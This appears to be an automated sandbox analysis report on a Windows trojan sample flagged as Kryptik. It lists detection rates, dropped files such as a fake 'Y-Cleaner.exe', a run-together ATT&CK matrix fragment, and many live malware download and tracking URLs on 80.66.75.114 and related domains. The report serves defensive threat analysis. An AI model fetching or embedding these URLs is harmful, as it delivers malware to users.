Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Deobfuscate/Decode Files or Information		NTDS1
Process Discovery		Distributed Component Object ModelInput Capture11
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
Obfuscated Files or Information		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts22
Software Packing		Cached Domain Credentials32
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Timestomp		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
DLL Side-Loading		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe50%ReversingLabs
SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe37%VirustotalBrowse
SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\soft[1]100%Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\soft[1]75%ReversingLabsByteCode-MSIL.Trojan.Malgent
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\soft[1]60%VirustotalBrowse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\dll[1]1%VirustotalBrowse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\dll[1]0%ReversingLabs
C:\Users\user\AppData\Local\Temp\WwsefYvRAzYZN1v3frKwFA1wF8\Bunifu_UI_v1.5.3.dll1%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\WwsefYvRAzYZN1v3frKwFA1wF8\Bunifu_UI_v1.5.3.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\WwsefYvRAzYZN1v3frKwFA1wF8\Y-Cleaner.exe75%ReversingLabsByteCode-MSIL.Trojan.Malgent
C:\Users\user\AppData\Local\Temp\WwsefYvRAzYZN1v3frKwFA1wF8\Y-Cleaner.exe60%VirustotalBrowse

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://upx.sf.net0%URL Reputationsafe
http://80.66.75.114/dll/key19%VirustotalBrowse
http://80.66.75.114/files/downloadu12%VirustotalBrowse
http://80.66.75.114/files/downloadw9%VirustotalBrowse
http://80.66.75.114/files/download310%VirustotalBrowse
http://80.66.75.114/soft/download916%VirustotalBrowse
http://80.66.75.114/files/download20%VirustotalBrowse
http://80.66.75.114/files/download?19%VirustotalBrowse
http://80.66.75.114/files/download915%VirustotalBrowse
http://80.66.75.114/soft/downloadE17%VirustotalBrowse
http://80.66.75.114/soft/download19%VirustotalBrowse
http://80.66.75.114/name20%VirustotalBrowse
http://80.66.75.114/files/downloadQ9%VirustotalBrowse
http://80.66.75.114/files/download4/files/download8%VirustotalBrowse
http://80.66.75.114/soft/downloadQ15%VirustotalBrowse
https://g-cleanit.hk1%VirustotalBrowse
http://80.66.75.114/files/download4/files/downloadu18%VirustotalBrowse
http://80.66.75.114/files/downloadE8%VirustotalBrowse
http://80.66.75.114/soft/download14/soft/download15%VirustotalBrowse
http://80.66.75.114/files/downloadA11%VirustotalBrowse
http://80.66.75.114/add?substr=mixnine&s=three&sub=NOSUB19%VirustotalBrowse
https://iplogger.org/1Pz8p71%VirustotalBrowse
http://80.66.75.114/files/downloadData16%VirustotalBrowse
http://80.66.75.114/dll/download19%VirustotalBrowse
http://80.66.75.114/files/downloadtem3210%VirustotalBrowse

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://80.66.75.114/dll/keyfalseunknown
http://80.66.75.114/files/downloadfalseunknown
http://80.66.75.114/soft/downloadfalseunknown
http://80.66.75.114/namefalseunknown
http://80.66.75.114/dll/downloadfalseunknown
http://80.66.75.114/add?substr=mixnine&s=three&sub=NOSUBfalseunknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://80.66.75.114/files/downloadwSecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1989766414.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1966614112.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2095732251.0000000000884000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1875503102.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1921168119.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2012468859.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1898317579.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1943970067.0000000000883000.00000004.00000020.00020000.00000000.sdmpfalseunknown
http://80.66.75.114/soft/download9SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2095732251.0000000000884000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000002.2953600985.000000000087D000.00000004.00000020.00020000.00000000.sdmpfalseunknown
http://80.66.75.114/files/downloaduSecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1989766414.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1807109955.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1966614112.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1829919159.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1875503102.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1921168119.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2012468859.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1852740816.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1898317579.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1943970067.0000000000883000.00000004.00000020.00020000.00000000.sdmpfalseunknown
http://80.66.75.114/files/download3SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1989766414.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1807109955.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1966614112.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1829919159.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2095732251.0000000000884000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1875503102.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1921168119.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2012468859.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000002.2953600985.000000000087D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1852740816.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1898317579.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1943970067.0000000000883000.00000004.00000020.00020000.00000000.sdmpfalseunknown
http://80.66.75.114/dll/downloadxASecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1989766414.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1807109955.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1966614112.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1829919159.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1875503102.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1921168119.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1852740816.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1898317579.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1943970067.0000000000883000.00000004.00000020.00020000.00000000.sdmpfalse
    		unknown
    http://80.66.75.114/files/download?SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1989766414.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1807109955.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1966614112.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1829919159.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2095732251.0000000000884000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1875503102.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1921168119.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2012468859.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000002.2953600985.000000000087D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1852740816.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1898317579.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1943970067.0000000000883000.00000004.00000020.00020000.00000000.sdmpfalseunknown
    http://80.66.75.114/files/download4/files/downloadSecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1966614112.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1921168119.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1943970067.0000000000883000.00000004.00000020.00020000.00000000.sdmpfalseunknown
    http://80.66.75.114/files/download9SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1989766414.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1966614112.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1875503102.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1921168119.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2012468859.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1898317579.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1943970067.0000000000883000.00000004.00000020.00020000.00000000.sdmpfalseunknown
    http://80.66.75.114/namem7nSecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1790805562.0000000000851000.00000004.00000020.00020000.00000000.sdmpfalse
      		unknown
      http://upx.sf.netAmcache.hve.3.drfalse
      • URL Reputation: safe
      		unknown
      http://80.66.75.114/files/downloadZvSecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1989766414.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1966614112.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2095732251.0000000000884000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1921168119.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2012468859.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1898317579.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1943970067.0000000000883000.00000004.00000020.00020000.00000000.sdmpfalse
        		unknown
        http://80.66.75.114/soft/downloadESecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2095732251.0000000000884000.00000004.00000020.00020000.00000000.sdmpfalseunknown
        http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2098391293.0000000002F9F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2095635491.0000000002DE5000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2096994132.0000000002F9E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2096994132.0000000002E9D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2102473420.0000000002FF8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2098475766.0000000002FE2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2101179469.0000000002F9F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2099803933.0000000003061000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drfalse
          		unknown
          http://80.66.75.114/files/download4/files/downloadESecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1829919159.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1852740816.0000000000883000.00000004.00000020.00020000.00000000.sdmpfalse
            		unknown
            http://80.66.75.114/nameQ?SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1790805562.0000000000851000.00000004.00000020.00020000.00000000.sdmpfalse
              		unknown
              http://80.66.75.114/files/downloadLMEMSecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1989766414.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1966614112.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1829919159.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2095732251.0000000000884000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1875503102.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1921168119.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2012468859.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000002.2953600985.000000000087D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1852740816.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1898317579.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1943970067.0000000000883000.00000004.00000020.00020000.00000000.sdmpfalse
                		unknown
                http://80.66.75.114/name=7SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000002.2953600985.0000000000851000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1790805562.0000000000851000.00000004.00000020.00020000.00000000.sdmpfalse
                  		unknown
                  http://80.66.75.114/files/downloadQSecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1989766414.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1966614112.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1921168119.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2012468859.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1943970067.0000000000883000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                  http://80.66.75.114/files/download4/files/downloaduSecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2095732251.0000000000884000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                  http://80.66.75.114/soft/downloadQSecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2095732251.0000000000884000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                  https://g-cleanit.hkSecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2098391293.0000000002F9F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2095635491.0000000002DE5000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2096994132.0000000002F9E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2096994132.0000000002E9D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2102473420.0000000002FF8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2098475766.0000000002FE2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2101179469.0000000002F9F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2099803933.0000000003061000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drfalseunknown
                  http://80.66.75.114/name-6.SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1790805562.0000000000851000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    http://80.66.75.114/files/downloadESecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1989766414.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1807109955.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1966614112.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1875503102.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1921168119.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2012468859.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1898317579.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1943970067.0000000000883000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                    http://80.66.75.114/files/downloadASecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2095732251.0000000000884000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2012468859.0000000000883000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                    http://80.66.75.114/dll/keym7nSecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000002.2953600985.0000000000851000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://80.66.75.114/soft/download14/soft/downloadSecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2095732251.0000000000884000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                      http://80.66.75.114/add?substr=mixnine&s=three&sub=NOSUBKSecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000002.2954051977.0000000002D36000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://80.66.75.114/files/downloadDataSecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1989766414.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1966614112.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2095732251.0000000000884000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1875503102.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1921168119.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2012468859.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1852740816.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1898317579.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1943970067.0000000000883000.00000004.00000020.00020000.00000000.sdmpfalseunknown
